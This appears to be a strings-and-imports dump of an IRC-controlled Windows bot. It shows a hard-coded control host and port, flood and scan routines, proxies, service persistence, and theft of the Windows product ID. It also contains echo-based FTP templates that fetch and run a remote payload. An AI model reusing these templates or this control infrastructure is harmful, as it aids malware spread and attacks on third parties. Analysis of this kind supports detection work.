sub_outside():
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	MSVCRT.strncmp
	KERNEL32.Process32Next
	MSVCRT.strstr
	MSVCRT.strncpy
	MSVCRT.wcscat
	MSVCRT.ftell
	MSVCRT.fseek
	WS2_32.send
	WS2_32.recv
	WS2_32.ntohs
	WS2_32.recvfrom
	WS2_32.inet_ntoa
	MSVCRT._snprintf
	MSVCRT.atoi
	MSVCRT.rand
	MSVCRT.strncat
	WS2_32.closesocket
	MSVCRT.sprintf
	KERNEL32.InterlockedCompareExchange
	MSVCRT._errno
	MSVCRT._strlwr
	MSVCRT.free

sub_4228F0(006c):
	"asn"

sub_42F110(0160):
	"net_write(1) returned	%d, errno = %d\n"
	"net_write(2) returned	%d, errno = %d\n"

sub_42E490(01e7):
	"%s\n"
	"%s\r\n"

sub_420300(0303):
	"ServicesActive"

sub_41A7D0(031f):
	WS2_32.select

sub_4322D0(03f4):
	KERNEL32.InterlockedCompareExchange

sub_41BA50(0a58):
	MSVCRT.rand

sub_41EF30(104c):
	WS2_32.send
	MSVCRT.atoi

	"220	\r\n"
	"220 \r\n"
	"331	\r\n"
	"331 \r\n"
	"230	\r\n"
	"230 \r\n"
	"200	\r\n"
	"200 \r\n"
	" "
	","
	","
	","
	","
	","
	","
	"%d.%d.%d.%d"
	"200	\r\n"
	"200 \r\n"
	"150	\r\n"
	"150 \r\n"
	"rb"
	"ftp: %d.%d.%d.%d -> (%d bytes) (total	s"...
	"226	\r\n"
	"226 \r\n"
	"221	\r\n"
	"221 \r\n"

sub_42B440(1800):
	"[%s] Starting	Socks4 Proxy on	port %d."
	"[%s] Unloaded	proxy on %d."

sub_430B30(1c39):
	MSVCRT._errno

sub_40B7D0(1ff1):
	"true"

sub_420E10(2049):
	":"
	"http"
	"ftp"
	"/"
	"/"
	"@"
	":"
	"/"
	"@"
	":"
	"http"
	"ftp"
	"/"
	"@"
	":"
	"/"
	"@"
	":"
	":"
	"/"
	":"
	"http"
	"ftp"
	"/"
	"/"
	"/"
	"/"

sub_406C80(23a6):
	MSVCRT.strtok

	" "
	" "
	"-update"
	"-netsvcs"
	"-bai"
	"-bai"
	" "
	" "

sub_41C710(2811):
	" "
	":"
	" "
	" "
	":"
	" "
	" "
	":"
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "

sub_413C30(2857):
	":"
	":"
	":"

sub_42AF10(28e3):
	WS2_32.closesocket

sub_4257F0(292c):
	WS2_32.send
	WS2_32.recv

sub_42F6F0(2d6b):
	MSVCRT.fread
	MSVCRT.fwrite

	"short	write: passed %d, wrote	%d\n"
	"localfile write"

sub_423760(2e37):
	"%d.%d.%d.%d"

sub_40B750(2fb5):
	"true"

sub_411C00(3261):
	" "
	" "
	"%s %s :%s\r\n"
	"%s"
	" "
	"%s"
	" "
	" "
	"%s %s %s\r\n"
	" "
	"%s %s\r\n"
	"%s\r\n"
	" "
	" "
	" "
	" "
	" "
	"%s %s %s %s\r\n"

sub_40D650(3355):
	"kernel32.dll"
	"RegisterServiceProcess"
	"CreateToolhelp32Snapshot"
	"Process32First"

sub_42DE00(35fe):
	MSVCRT.fprintf
	MSVCRT.strncmp

	"Control socket read failed"
	"%s"
	"%s"

sub_4269A0(37e7):
	WS2_32.closesocket

sub_4138A0(387f):
	"%2.2X"

sub_4200F0(3a71):
	"SYSTEM\\CurrentControlSet\\Services\\%s"
	"ImagePath"
	"\\"

sub_42E870(3cae):
	"Invalid direction %d\n"
	"Invalid	mode %c\n"
	"PASV"
	"%u,%u,%u,%u,%u,%u"
	"getsockname"
	"setsockopt"
	"setsockopt"
	"connect"
	"bind"
	"listen"
	"PORT %d,%d,%d,%d,%d,%d"
	"calloc"

sub_427D50(3ead):
	"%s: %s:%u (%dseconds)"
	"%s: error creating threads"
	"%s: attack@%s:%d done."
	"%s"

sub_4077E0(43e9):
	"f.unicat.org"
	"9890"
	"Xkey"
	"aydassklfsdsewrlkwel"
	"X-"
	"set"
	"evil"
	"MicroSoft Visual SP"

sub_41FF90(4492):
	"unknown"

sub_427FD0(462a):
	WS2_32.socket

sub_422B40(4d72):
	MSVCRT.atoi
	WS2_32.send
	MSVCRT.strrchr

	"scan: cip (%s)"
	"scan:	not started"
	" "
	"ftp: port: %d, total sends: %d"
	"scan:	stopped	(%d threads)"
	"scan:	couldn't stop"
	" "
	"scan:	too many threads (%s)"
	" "
	"scan: stats:"
	" %s:	%d,"
	" total: %d"
	" "
	" "
	" "
	" "
	" "
	"scan:	invalid	port"
	" "
	" "
	" "
	" -b"
	"scan:	no ip specified"
	"random"
	"sequential"
	"Scan(%s): %s Port Scan %s:%d - Delay %d"...

sub_414E00(4f91):
	" "
	" "

sub_403F80(5164):
	"%s %s\r\n"
	"%s"

sub_42E5B0(5357):
	MSVCRT.sprintf

	"Missing path argument	for file transfer"...
	"Invalid open type %d\n"

sub_41D830(5481):
	":"
	":"
	":"
	"ftp(badlogin)"
	"ftp(getting)"
	"ftp(baddl)"
	"http(badconnect)"
	"GET %s HTTP/1.0\r\nConnection: Keep-Alive"...
	"http(getting)"
	"wb"
	"http(badopen)"
	"\r\n\r\n"
	"dl, done. %s ."
	"open	%s."
	"dl'ed-update: %s"
	"exec.error"

sub_40F170(548c):
	"ServicesActive"

sub_432570(57b7):
	"KERNEL32.DLL"
	"InterlockedCompareExchange"

sub_42DF40(5e6e):
	"\r\n"
	"read"

sub_40F050(613f):
	"ServicesActive"

sub_428AB0(6141):
	MSVCRT.rand
	WS2_32.sendto

sub_40EE30(64c7):
	"ServicesActive"
	"\"%s\" %s"

sub_40ECF0(6573):
	"-netsvcs"

sub_428DC0(6820):
	WS2_32.recv

sub_427800(69b7):
	"%s: %s (%utimes/%ubytes/%dms)"
	"[%s] Finished	flooding %s %d Times"
	"[%s] Cannot send pings - Doesn't have D"...

sub_40CC80(6d2d):
	" "
	" "
	"\\"
	"Files Found: %d"

sub_4207E0(74a7):
	"AudioSrv"
	"Browser"
	"CryptSvc"
	"Dhcp"
	"dmserver"
	"Dnscache"
	"ERSvc"
	"Eventlog"
	"EventSystem"
	"FastUserSwitchingCompatibility"
	"helpsvc"
	"lanmanserver"
	"lanmanworkstation"
	"LmHosts"
	"Netman"
	"Nla"
	"PlugPlay"
	"PolicyAgent"
	"ProtectedStorage"
	"RasMan"
	"RpcSs"
	"SamSs"
	"Schedule"
	"seclogon"
	"SENS"
	"ShellHWDetection"
	"Spooler"
	"SSDPSRV"
	"stisvc"
	"TapiSrv"
	"TermService"
	"TrkWks"
	"upnphost"
	"W32Time"
	"winmgmt"
	"WZCSVC"
	"wuauserv"
	"Themes"
	"SYSTEM\\CurrentControlSet\\Services\\%s"
	"[%s] [????.exe] (Unknown key)"
	"ImagePath"
	"[%s] [????.exe]"
	"[%s]	[%s]"

sub_42AFF0(75a9):
	"Socks4"

sub_42AC10(75a9):
	"HTTP"

sub_427C90(75a9):
	"forsyn"

sub_42B380(75a9):
	"Socks4"

sub_4281A0(75a9):
	"syn"

sub_427740(75a9):
	"ping"

sub_4066A0(7a4c):
	"up:	%dd %dh	%dm"

sub_40A250(7c6d):
	MSVCRT.strstr

sub_425100(7e10):
	WS2_32.ntohs

	"cmd /c echo open %s %d >> ii &echo user"...

sub_42AE10(80fe):
	"[%s] Starting	proxy on %d with SSL."
	"[%s] Starting	proxy on port %d."
	"[%s] Unloaded	proxy on port %d."

sub_40DC10(850e):
	"%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n"
	"%%comspec%% /c %s	%s"

sub_432BF0(85ed):
	MSVCRT.free

sub_42FD30(89f2):
	MSVCRT.free

	"QUIT"

sub_406850(8e70):
	"95"
	"NT"
	"98"
	"ME"
	"2000"
	"XP"
	"2003"
	"???"
	"%s [%s]"
	"CPU: %dMHz. Memory: %dMB/%dMB. OS: Win "...

sub_42B0B0(8ef1):
	WS2_32.recv
	WS2_32.ioctlsocket
	WS2_32.closesocket

sub_4122D0(9060):
	"%d.%d.%d.%d"
	"lan:	"
	". "
	". "
	"[PRIVATE]"
	"[PUBLIC]"

sub_434D10(9072):
	"�"

sub_403530(917c):
	"|"
	"a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t"...

sub_419300(9546):
	MSVCRT._stricmp
	WS2_32.ntohs

	" "
	"established"
	"listening"
	"%s:%d"
	"%s:%d"
	"%s: %d"
	"%s: %s"

sub_41F860(95c9):
	MSVCRT.rand
	WS2_32.closesocket

sub_424F00(9c4f):
	WS2_32.send

sub_40A190(9cfe):
	MSVCRT.strchr

sub_419BE0(a03e):
	MSVCRT.strncpy

	"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"

sub_42F2C0(a081):
	MSVCRT.free

sub_420530(a712):
	"PSAPI.DLL"
	"PSAPI.DLL"
	"EnumProcessModules"
	"GetModuleFileNameExA"
	"unknown"

sub_429170(b1b6):
	"[%s] Started redirect	from \"%s\" to \"%s\""...
	"[%s] Finished	redirect from \"%s\" to	\"%s"...

sub_40FE30(c615):
	MSVCRT.strstr

	"%d.%d.%d.%d"
	"%s %s\r\n"
	"%s %s\r\n%s %s 0 0 :%s\r\n"
	" "
	" "
	" "
	" "
	"%s %s\r\n"
	" "
	" "
	" "
	"%s %s\r\n"
	"%s %s %s\r\n"
	" "
	"%s %s %s\r\n"
	"%s %s\r\n"
	" "
	" "
	"@"
	":"
	"|"
	"|"
	" -s"
	" -n"
	" -o"
	" "
	" "
	"|"
	"|"
	" "
	" -o"
	" -s"
	" -n"
	":"
	" "
	"!"
	"!"
	"@"
	"@"
	" "
	" "
	" :"
	" "
	" "
	" "
	" "
	" "
	":"
	"!"
	"%s %s %s\r\n"
	" "
	":"
	"!"
	" :"
	" :"
	" "
	" "
	":"
	"!"
	":"
	"!"
	":"
	"!"

sub_41A050(ca0b):
	MSVCRT.strstr

sub_404600(caf0):
	" -o"
	" "
	" "
	" "
	" "

sub_42C830(cbb4):
	WS2_32.ioctlsocket
	WS2_32.recv
	WS2_32.send
	WS2_32.closesocket

sub_424920(cd36):
	"�B�B�B�B"
	"CCCC"

sub_42E3C0(cf06):
	MSVCRT.sprintf

	"USER	%s"
	"PASS	%s"

sub_40F0F0(cfb9):
	"ServicesActive"

sub_432850(d3f7):
	MSVCRT.free

sub_412590(d41e):
	"%s %s :%s\r\n"

sub_41E660(d513):
	"%d. - Pid: %d - \"%s\""
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "

sub_41BD90(d56c):
	MSVCRT.strtok

sub_41A3B0(d618):
	WS2_32.WSAGetLastError
	WS2_32.select

sub_40D030(dd11):
	MSVCRT._snprintf

	"%s\\*"
	"Found: %s\\%s"

sub_42DB00(dee0):
	"tcp"
	"ftp"
	"tcp"

sub_427980(dfe9):
	IPHLPAPI.IcmpCreateFile
	IPHLPAPI.IcmpSendEcho
	IPHLPAPI.IcmpCloseHandle

	"ICMP.DLL"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"

sub_4369E0(e0e0):
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	"HKCR: %s"
	" "
	" "
	"HKU:	%s"
	"Software\\Microsoft\\Windows\\CurrentVersi"...
	"ProductId"
	"Found	Windows	Product	ID (%s)."

sub_42CB70(e8f9):
	"[%s] Redirecting from	Port %d	to '%s:%d"...
	"[%s] Finished	redirecting from port %d "...

sub_428940(e9eb):
	"%s: %s:%u	(%ut/%ub/%dms)"

sub_42B8E0(f045):
	WS2_32.socket
	WS2_32.sendto
	WS2_32.closesocket

sub_428260(f15c):
	"%s: %s:%u	(%usec/%dms)"

sub_4253C0(f1c1):
	WS2_32.recv

	"echo open %s %d>.pif \r\n"
	"echo user a a>>.pif \r\n"
	"echo binary>>.pif \r\n"
	"echo GET %s>>.pif \r\n"
	"echo bye>>.pif \r\n"
	"echo @echo off >c.bat\r\n"
	"echo ftp -n -v -s:.pif >>c.bat\r\n"
	"echo %s >>c.bat\r\n"
	"echo del .pif	>>c.bat\r\n"
	"echo del /F c.bat >>c.bat\r\n"
	"echo exit /y >>c.bat\r\n"

sub_40C4D0(f4d6):
	" "
	"[DCC]: Failed	to create socket."
	"dcc: failed to bind socket"
	"dcc: failed to open socket"
	"dcc: file doesn't exist"
	"[DCC]: File doesn't exist."
	"dcc: timeout"
	"dcc: unable to open socket"
	"dcc: complete	to %s, file: %s, (%d byte"...
	"dcc: socket error"

sub_42BB00(f7c6):
	WS2_32.select
	WS2_32.recv
	WS2_32.send

sub_426070(f8d1):
	MSVCRT._snprintf
	WS2_32.send

	"open %s %d >>	ii &echo user a	a >> ii	&"...
	"%s\r\n"

sub_42C1B0(fa28):
	WS2_32.accept

sub_423860(fb69):
	MSVCRT.rand

	"%d.%d.%d.%d"

sub_404C30(fbb9):
	" "
	" "
	"exec.error"
	" "
	" "
	"open"
	" "
	" "
	" "
	"%s resolved %s"
	" "
	" "
	"%s -> %s"
	" "
	"resolve.error	%s."
	"%s %s\r\n"
	"%s"
	" "
	"Executed:	%s."
	"exec.error"
	" "
	"%s"
	"%s %s\r\n"
	" "
	"N"
	"Software\\Microsoft\\OLE"